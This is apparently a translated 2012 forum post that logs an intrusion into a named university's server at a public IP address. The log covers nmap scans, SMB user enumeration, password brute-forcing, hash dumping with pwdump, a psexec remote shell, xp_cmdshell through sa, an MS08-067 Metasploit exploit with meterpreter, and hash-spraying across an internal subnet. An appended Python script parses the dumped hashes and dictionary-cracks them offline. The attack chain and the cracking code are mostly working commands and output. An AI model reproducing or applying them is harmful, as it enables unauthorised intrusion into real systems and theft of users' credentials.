nmap+msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42

Guangxi Normal University website: http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.00048s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb     // list the SMB scan scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241     // use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.00038s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser     // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241     // list shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.00035s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241     // obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.00041s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2     // grab hashes

root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data

root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse

root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.0012s latency).

PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe     // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"     // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241     // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST

Nmap scan report for bogon (202.103.242.241)

Host is up (0.00046s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole     // exploit the MS08-067 vulnerability against the target machine from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254     // try logging in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105

Host is up (0.00088s latency).

Not shown: 993 closed ports

PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv

MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
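What the dumped hashes already say before anything is cracked, as an added example (not part of the original post and not the author's code): a standard-library-only Python script that parses the smb-pwdump lines shown in the post, reads the blank-password marker and the second LM half off each entry, and runs an offline dictionary check of the NT hashes with its own MD4 so it works without hashlib's MD4 provider. The hash lines are copied from the post's output; the wordlist, the function names and the finding strings are constructed for this example.

```python
"""Offline triage of pwdump-style SMB hash dumps (added example, not the post's code).

Input lines look like the smb-pwdump output above:  user:rid => LMHASH:NTHASH
pwdump6 prints "NO PASSWORD****..." instead of the hash of an empty password.
"""
import struct

MASK = 0xFFFFFFFF
# DES of the LM magic string under an all-zero 7-byte key: the LM half of an
# empty (or absent) 7-character password chunk.
EMPTY_LM_HALF = "AAD3B435B51404EE"
# MD4 of the empty UTF-16-LE string: the NT hash of a blank password.
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"


def _rot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (the NT hash is MD4 over the UTF-16-LE password)."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    v = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, list(range(16)), (3, 7, 11, 19), 0),
        (G, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (H, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = v[:]
        for f, ks, ss, add in rounds:
            for i in range(16):
                t = (-i) % 4                       # update order a, d, c, b, a, d, ...
                x, y, z = s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]
                s[t] = _rot((s[t] + f(x, y, z) + X[ks[i]] + add) & MASK, ss[i % 4])
        v = [(a + b) & MASK for a, b in zip(v, s)]
    return struct.pack("<4I", *v)


def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16-le")).hex().upper()


def parse_pwdump(text: str):
    """Parse smb-pwdump's 'user:rid => LM:NT' lines into dicts with real hex hashes."""
    entries = []
    for line in text.splitlines():
        line = line.lstrip("|_ ").strip()
        if "=>" not in line:
            continue
        ident, hashes = (p.strip() for p in line.split("=>", 1))
        user, rid = ident.rsplit(":", 1)
        lm, nt = hashes.split(":", 1)
        if lm.startswith("NO PASSWORD"):           # pwdump6's blank-password marker
            lm = EMPTY_LM_HALF * 2
        if nt.startswith("NO PASSWORD"):
            nt = EMPTY_NT
        entries.append({"user": user, "rid": int(rid), "lm": lm.upper(), "nt": nt.upper()})
    return entries


def assess(entry):
    """Weaknesses an auditor can read straight off one dumped entry, no cracking needed."""
    findings = []
    lm, nt = entry["lm"], entry["nt"]
    if nt == EMPTY_NT:
        findings.append("blank password")
    elif lm != EMPTY_LM_HALF * 2:
        # Any stored LM hash means the password is at most 14 characters, case-folded,
        # and each 7-character half can be brute-forced on its own.
        findings.append("LM hash stored")
        if lm[16:] == EMPTY_LM_HALF:               # second half empty: 7 chars or fewer
            findings.append("password is 7 characters or fewer")
    return findings


def crack_nt(entries, wordlist):
    """Offline dictionary attack: one MD4 per candidate, checked against every NT hash."""
    table = {nt_hash(w): w for w in wordlist}
    return {e["user"]: table[e["nt"]] for e in entries if e["nt"] in table}


# Copied from the smb-pwdump output in the post above.
SAMPLE_DUMP = """\
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
"""
# Constructed wordlist; 123456 is the password smb-brute found for "test" above.
WORDLIST = ["password", "admin", "123456", "guangxi"]

if __name__ == "__main__":
    entries = parse_pwdump(SAMPLE_DUMP)
    for e in entries:
        print(f"{e['user']:15} {', '.join(assess(e)) or 'no obvious weakness'}")
    print("cracked:", crack_nt(entries, WORDLIST))
```

Run on the post's four lines, the script reports Administrator and Guest as blank (the same fact smb-brute found as administrator:<blank>), test as an LM-stored password of seven characters or fewer that the wordlist recovers as 123456, and TsInternetUser as LM-stored but longer than seven characters. The second LM half equal to AAD3B435B51404EE is a length leak that needs no cracking at all, which is why disabling LM hash storage mattered on Windows 2000 hosts like this one.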
